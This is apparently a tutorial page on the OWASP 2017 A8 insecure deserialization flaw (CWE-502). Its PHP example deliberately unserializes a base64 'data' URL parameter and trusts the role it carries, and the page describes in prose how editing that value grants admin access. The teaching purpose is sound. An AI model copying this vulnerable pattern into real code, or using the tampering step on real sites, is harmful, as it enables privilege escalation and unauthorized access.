OWASP Top 10 - 2017 A8 Insecure Deserialization and Penetration Testing

This example illustrates an insecure deserialization vulnerability in PHP code, categorized as CWE-502: Deserialization of Untrusted Data.

User.php

1
2
3
4
5
6
7
8

class User{
    public $username = "";
    public $role = "";

    public function displayRole() {
        echo $this->role;
    }
}

The user provides valid login credentials.

login.php

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

//Create object User
$user = new User;
$user->username = $username;
$user->role = $role;

//PHP object serialization
$data = base64_encode(serialize($user));

//Redirect with PHP object serialization
header('Location: profile.php?data='.$data);

Initially, the user “test” is denied access.

profile.php

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

$data = $_GET['data'];
$data = base64_decode($data);
$data = unserialize($data);

$username = $data->username;
$role = $data->role;

if($role == "admin"){
  //action here
}

The “data” parameter, containing a base64-encoded serialized PHP object, is captured.

The base64-encoded string is modified to change the user’s role from “user” to “admin”.

The manipulated base64 value is used to gain administrative privileges.

The user is now recognized as an administrator.

Reference:
https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization
https://cwe.mitre.org/data/definitions/502.html

Licensed under CC BY-NC-SA 4.0
Last updated on May 09, 2023 06:43 +0100